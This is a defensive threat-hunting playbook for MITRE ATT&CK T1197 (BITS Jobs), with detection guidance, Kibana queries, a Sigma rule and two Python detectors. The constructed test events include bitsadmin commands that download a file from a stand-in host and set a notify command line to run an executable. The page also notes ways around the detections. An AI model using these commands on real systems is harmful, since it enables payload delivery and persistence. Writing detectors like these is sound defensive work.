# T1197 BITS Jobs

-----------------------------------------------------------------------

## Technique Description

Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications that prefer to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, each of which contains a queue of one or more file operations.

The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin)

Adversaries may abuse BITS to download, execute, and even clean up after running malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016)

BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016)

## Technique Detection

BITS runs as a service and its status can be checked with the Sc query utility (<code>sc query bits</code>).(Citation: Microsoft Issues with BITS July 2011) Active BITS tasks can be enumerated using the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (<code>bitsadmin /list /allusers /verbose</code>).(Citation: Microsoft BITS)

Monitor usage of the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (especially the 'Transfer', 'Create', 'AddFile', 'SetNotifyFlags', 'SetNotifyCmdLine', 'SetMinRetryDelay', 'SetCustomHeaders', and 'Resume' command options),(Citation: Microsoft BITS) Admin logs, PowerShell logs, and the Windows Event log for BITS activity.(Citation: Elastic - Hunting for Persistence Part 1) Also consider investigating more detailed information about jobs by parsing the BITS job database.(Citation: CTU BITS Malware June 2016)

Monitor and analyze network activity generated by BITS. BITS jobs use HTTP(S) and SMB for remote connections, are tethered to the creating user, and will only function while that user is logged on (this holds even if a user attaches the job to a service account).(Citation: Microsoft BITS)

-----------------------------------------------------------------------

### Tactics:

  * Defense-Evasion

  * Persistence

### Platforms:

  * Windows

### Adversary Required Permissions:

  * User

  * Administrator

  * SYSTEM

### Defenses Bypassed:

  * Firewall

  * Host forensic analysis

### Data Sources:

  * **Process:** Process Creation

  * **Network Traffic:** Network Connection Creation

  * **Command:** Command Execution

  * **Service:** Service Metadata

-----------------------------------------------------------------------

### Adversarial usage:

| Adversary Group |  Adversarial Usage |
|----|----|
| APT41 | [APT41](https://attack.mitre.org/groups/G0096) used [BITSAdmin](https://attack.mitre.org/software/S0190) to download and install payloads.(Citation: FireEye APT41 March 2020)(Citation: Crowdstrike GTR2020 Mar 2020) |
| APT39 | [APT39](https://attack.mitre.org/groups/G0087) has used the BITS protocol to exfiltrate stolen data from a compromised host.(Citation: FBI FLASH APT39 September 2020) |
| Leviathan | [Leviathan](https://attack.mitre.org/groups/G0065) has used [BITSAdmin](https://attack.mitre.org/software/S0190) to download additional tools.(Citation: FireEye Periscope March 2018) |
| Patchwork | [Patchwork](https://attack.mitre.org/groups/G0040) has used BITS jobs to download malicious payloads.(Citation: Unit 42 BackConfig May 2020) |

-----------------------------------------------------------------------

## Mitre References

  * [Mitre-Attack](https://attack.mitre.org/techniques/T1197)

  * [Microsoft Com](https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx), Microsoft. (n.d.). Component Object Model (COM). Retrieved November 22, 2017.

  * [Microsoft Bits](https://msdn.microsoft.com/library/windows/desktop/bb968799.aspx), Microsoft. (n.d.). Background Intelligent Transfer Service. Retrieved January 12, 2018.

  * [Microsoft Bitsadmin](https://msdn.microsoft.com/library/aa362813.aspx), Microsoft. (n.d.). BITSAdmin Tool. Retrieved January 12, 2018.

  * [Ctu Bits Malware June 2016](https://www.secureworks.com/blog/malware-lingers-with-bits), Counter Threat Unit Research Team. (2016, June 6). Malware Lingers with BITS. Retrieved January 12, 2018.

  * [Mondok Windows Piggyback Bits May 2007](https://arstechnica.com/information-technology/2007/05/malware-piggybacks-on-windows-background-intelligent-transfer-service/), Mondok, M. (2007, May 11). Malware piggybacks on Windows’ Background Intelligent Transfer Service. Retrieved January 12, 2018.

  * [Symantec Bits May 2007](https://www.symantec.com/connect/blogs/malware-update-windows-update), Florio, E. (2007, May 9). Malware Update with Windows Update. Retrieved January 12, 2018.

  * [Paloalto Uboatrat Nov 2017](https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/), Hayashi, K. (2017, November 28). UBoatRAT Navigates East Asia. Retrieved January 12, 2018.

  * [Microsoft Issues With Bits July 2011](https://technet.microsoft.com/library/dd939934.aspx), Microsoft. (2011, July 19). Issues with BITS. Retrieved January 12, 2018.

  * [Elastic - Hunting For Persistence Part 1](https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1), French, D., Murphy, B. (2020, March 24). Adversary tradecraft 101: Hunting for persistence using Elastic Security (Part 1). Retrieved December 21, 2020.

> *Note: Do not edit this cell with information you want to keep. This cell will be wiped when the update script is run. Store permanent information in one of the relevant cells below.*

*Last pulled from Mitre on: 23 June 2022*



-----------------------------------------------------------------------

## Metadata

  * **Last Updated Date:** 8 July 2021

  * **Author(s):** SSgt Johnathan Smith, SSgt John Beres

  * **Validated:** NO

-----------------------------------------------------------------------

## Overall Hypothesis

- N/A

## Adversary Examples

| Adversary Specific Examples | Host Analytics | Network Analytics |
|-----------------------------|----------------|-------------------|
| Example APT/Threat actor | 1, 2 | 2, 3, 5|

## Detection Blindspots

- Network IOCs will only be visible if the BITS job was executed during collection.
- Because this tool is used for many legitimate purposes, common SIGMA signatures do not identify all possible manipulations of the program. They are a good start for identifying process execution, but they commonly rely on command line arguments that can be easily spoofed or altered to evade signature detection.
- There is also the possibility of an adversary crafting a custom C# program to interface with the BITS COM interface and schedule a file download without using "bitsadmin.exe" or the PowerShell cmdlets at all. This would of course leave other artifacts, but it would bypass the detections demonstrated here.

## Analytical References

  * [Emporal Persistence with and schtasks 2014 (blogspot)](https://0xthem.blogspot.com/2014/03/t-emporal-persistence-with-and-schtasks.html)
  * [Using BITS (microsoft)](https://docs.microsoft.com/en-us/windows/win32/bits/using-bits)
  * [BITS Sample Download (microsoft)](https://docs.microsoft.com/en-us/windows/win32/bits/bits-dot-net#quick-sample-download-a-file)
  * [Backdoor Stealth Falcon Group 2019 (welivesecurity)](https://www.welivesecurity.com/2019/09/09/backdoor-stealth-falcon-group/)
  * [Latest Astaroth Living off the Land Attacks 2020 (microsoft)](https://www.microsoft.com/security/blog/2020/03/23/latest-astaroth-living-off-the-land-attacks-are-even-more-invisible-but-not-less-observable/)
  * [Attack Detection Fundamentals - Code Execution and Persistence (f-secure)](https://labs.f-secure.com/blog/attack-detection-fundamentals-code-execution-and-persistence-lab-1/)

-----------------------------------------------------------------------

## Host Analytics

-----------------------------------------------------------------------

### Hunter Notes

- BITS can be used for downloading, copying, execution, and persistence

#### Analytic 1

  * **Information:** BITSAdmin Download

  * **Source:** Windows Audits, Sysmon

  * **Tool:**  Kibana

  * **Notes:** 

  * **Query:** ```event_id: 1 and process_command_line: *bitsadmin*```
  * **Query:** ```event_id: 4688 and process_command_line: *bitsadmin*```
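The two queries above only answer "did bitsadmin.exe run"; the detection guidance in the technique description singles out the command options that matter (Transfer, Create, AddFile, SetNotifyFlags, SetNotifyCmdLine, SetMinRetryDelay, SetCustomHeaders, Resume). The following Python is an added example for this playbook, not code from MITRE or any cited source: it applies Analytic 1 to process-creation records and then ranks the hits by which of those options appear, so a job given a notify command line surfaces above a plain download. The flattened field names follow the Kibana queries (`event_id`, `process_command_line`); `process_path`, `process_original_file_name` and `host_name` are assumed ingest names, the option weights are the example's own choice, and every record is constructed.

```python
import re

# Options from the detection guidance above. Those that shape what a job
# does after creation (notification, retries, headers) weigh more than a
# plain download, because they are what persistence needs.
WATCHED_OPTIONS = {
    "transfer": 1, "create": 1, "addfile": 1, "resume": 1,
    "setminretrydelay": 2, "setcustomheaders": 2,
    "setnotifyflags": 3, "setnotifycmdline": 3,
}

PROCESS_CREATE_IDS = {1, 4688}  # Sysmon EID 1 and Security EID 4688

# An option is a slash-prefixed word at the start of the line or after
# whitespace, so URL path segments ("https://host/file") are not picked up.
OPTION_RE = re.compile(r"(?<!\S)/([A-Za-z]+)")


def bitsadmin_options(command_line: str) -> list[str]:
    """Lower-cased /options in order of appearance."""
    return [m.group(1).lower() for m in OPTION_RE.finditer(command_line)]


def is_bitsadmin(event: dict) -> bool:
    """Match on command line, image path, or PE OriginalFileName.

    OriginalFileName comes from the binary's version resource, so it
    survives a rename of bitsadmin.exe on disk (Sysmon records it in EID 1;
    the flattened field name used here is an assumption about the ingest).
    """
    fields = (
        event.get("process_command_line", ""),
        event.get("process_path", ""),
        event.get("process_original_file_name", ""),
    )
    return any("bitsadmin" in f.lower() for f in fields)


def score_event(event: dict):
    """Return None for events outside the analytic, else a finding dict."""
    if event.get("event_id") not in PROCESS_CREATE_IDS or not is_bitsadmin(event):
        return None
    options = bitsadmin_options(event.get("process_command_line", ""))
    watched = [o for o in options if o in WATCHED_OPTIONS]
    return {
        "host": event.get("host_name"),
        "options": options,
        "watched": watched,
        "score": sum(WATCHED_OPTIONS[o] for o in watched),
    }


def hunt(events: list[dict]) -> list[dict]:
    """Findings, highest score first, so notify-command-line jobs lead."""
    findings = [f for f in map(score_event, events) if f is not None]
    return sorted(findings, key=lambda f: f["score"], reverse=True)


# Constructed records in the shape the Kibana queries assume; host names,
# paths and URLs are invented for the example.
SAMPLE_EVENTS = [
    {"event_id": 1, "host_name": "ws01",
     "process_path": r"C:\Windows\System32\bitsadmin.exe",
     "process_command_line": r"bitsadmin /transfer job1 /download /priority normal https://cdn.example.invalid/tool.bin C:\Users\Public\tool.bin"},
    {"event_id": 4688, "host_name": "ws02",
     "process_path": r"C:\Windows\System32\bitsadmin.exe",
     "process_command_line": r"bitsadmin /SetNotifyCmdLine job2 C:\Users\Public\run.exe NULL"},
    {"event_id": 4688, "host_name": "ws02",
     "process_path": r"C:\Windows\System32\bitsadmin.exe",
     "process_command_line": "bitsadmin /resume job2"},
    # Renamed copy: only the version-resource name still says bitsadmin.
    {"event_id": 1, "host_name": "ws03",
     "process_path": r"C:\Users\Public\svc.exe",
     "process_original_file_name": "bitsadmin.exe",
     "process_command_line": "svc.exe /create job3"},
    # Network-connection event (EID 3), not process creation: out of scope.
    {"event_id": 3, "host_name": "ws01",
     "process_command_line": "bitsadmin /transfer job1 ..."},
    {"event_id": 1, "host_name": "ws04",
     "process_path": r"C:\Windows\System32\notepad.exe",
     "process_command_line": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f['host']}: score={f['score']} watched={f['watched']}")
```

The renamed-binary record is the blindspot described later in this playbook: a `*bitsadmin*` command-line search alone misses it, and only the OriginalFileName check keeps it in scope. A job created from custom COM code, without bitsadmin.exe at all, still produces no process-creation hit here.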

#### Analytic 2

  * **Information:** BITSAdmin via PowerShell

  * **Source:** Windows Audits, Sysmon

  * **Tool:**  Kibana

  * **Notes:** 

  * **Query:** ```powershell.command.name: *Bits*```



-----------------------------------------------------------------------

## Network Analytics

-----------------------------------------------------------------------

### Hunter Notes

- The BITSAdmin client also has a User Agent of "BITS". Ingesting web proxy logs and filtering on this User Agent would allow you to identify all hosts talking externally through this LOLBin.

Example of a network SIGMA signature for BITSAdmin connections to domains with uncommon TLDs:

```yaml
detection:
    selection:
        c-useragent:
            - 'Microsoft BITS/*'
    falsepositives:
        r-dns:
            - '*.com'
            - '*.net'
            - '*.org'
    condition: selection and not falsepositives
```
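To make the rule's semantics concrete, the Python below is an added example for this playbook (not from the page or from any Sigma tooling): it evaluates the `selection and not falsepositives` condition over proxy records with Sigma's usual case-insensitive wildcard matching, and also produces the per-host inventory the hunter note above asks for (every internal client that used BITS externally, whatever the TLD). The field names `c-useragent` and `r-dns` come from the rule; `c-ip` is an assumed client-address field, and all log records are constructed (the `.invalid` domain and the 203.0.113.0/24 address are reserved documentation values).

```python
from collections import defaultdict
from fnmatch import fnmatchcase

# The two search identifiers from the Sigma rule above.
SELECTION = {"c-useragent": ["Microsoft BITS/*"]}
FALSEPOSITIVES = {"r-dns": ["*.com", "*.net", "*.org"]}


def field_matches(value, patterns) -> bool:
    """Sigma list semantics: the value matches any one pattern.
    Sigma string matching is case-insensitive, so both sides are lowered;
    fnmatchcase is used because plain fnmatch folds case only on Windows."""
    value = str(value).lower()
    return any(fnmatchcase(value, p.lower()) for p in patterns)


def matches(record: dict, search: dict) -> bool:
    """Sigma map semantics: every field in the search must match."""
    return all(field_matches(record.get(f, ""), pats) for f, pats in search.items())


def bits_uncommon_tld(record: dict) -> bool:
    """condition: selection and not falsepositives"""
    return matches(record, SELECTION) and not matches(record, FALSEPOSITIVES)


def alerts(records) -> list[dict]:
    return [r for r in records if bits_uncommon_tld(r)]


def bits_hosts(records) -> dict:
    """Every client that sent the BITS User-Agent, with its destinations,
    independent of the TLD allow-list (the hunter note's inventory)."""
    hosts = defaultdict(set)
    for r in records:
        if matches(r, SELECTION):
            hosts[r["c-ip"]].add(r["r-dns"])
    return {h: sorted(d) for h, d in hosts.items()}


# Constructed proxy records; only the first destination is a real
# update host, included as the expected benign case.
SAMPLE_LOGS = [
    {"c-ip": "10.0.0.11", "c-useragent": "Microsoft BITS/7.8",
     "r-dns": "download.windowsupdate.com"},
    {"c-ip": "10.0.0.12", "c-useragent": "Microsoft BITS/7.8",
     "r-dns": "cdn.update-check.invalid"},        # uncommon TLD -> alert
    {"c-ip": "10.0.0.13", "c-useragent": "Mozilla/5.0 (Windows NT 10.0)",
     "r-dns": "cdn.update-check.invalid"},        # not BITS -> ignored
    {"c-ip": "10.0.0.11", "c-useragent": "microsoft bits/7.8",
     "r-dns": "mirror.example.org"},              # case differs, still benign
    {"c-ip": "10.0.0.14", "c-useragent": "Microsoft BITS/7.8",
     "r-dns": "203.0.113.10"},                    # direct-to-IP, no TLD -> alert
]

if __name__ == "__main__":
    for r in alerts(SAMPLE_LOGS):
        print(f"ALERT {r['c-ip']} -> {r['r-dns']}")
    for host, dests in bits_hosts(SAMPLE_LOGS).items():
        print(f"{host}: {', '.join(dests)}")
```

Two behaviours are worth knowing before deploying the rule as written: a transfer straight to an IP address has no TLD to allow-list and therefore alerts, which is usually what you want, and the `*.com` patterns also pass any attacker-controlled `.com` host, so the TLD filter is a noise reducer rather than a safety check.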

#### Analytic 1

  * **Information:** 'Comments'

  * **Source:** 'ex Windows Audits, Sysmon'

  * **Tool:** 'Arkime, Kibana, Autopsy'

  * **Notes:** 'Various notes to assist with hunting.'

  * **Query:** ```Input your query here```



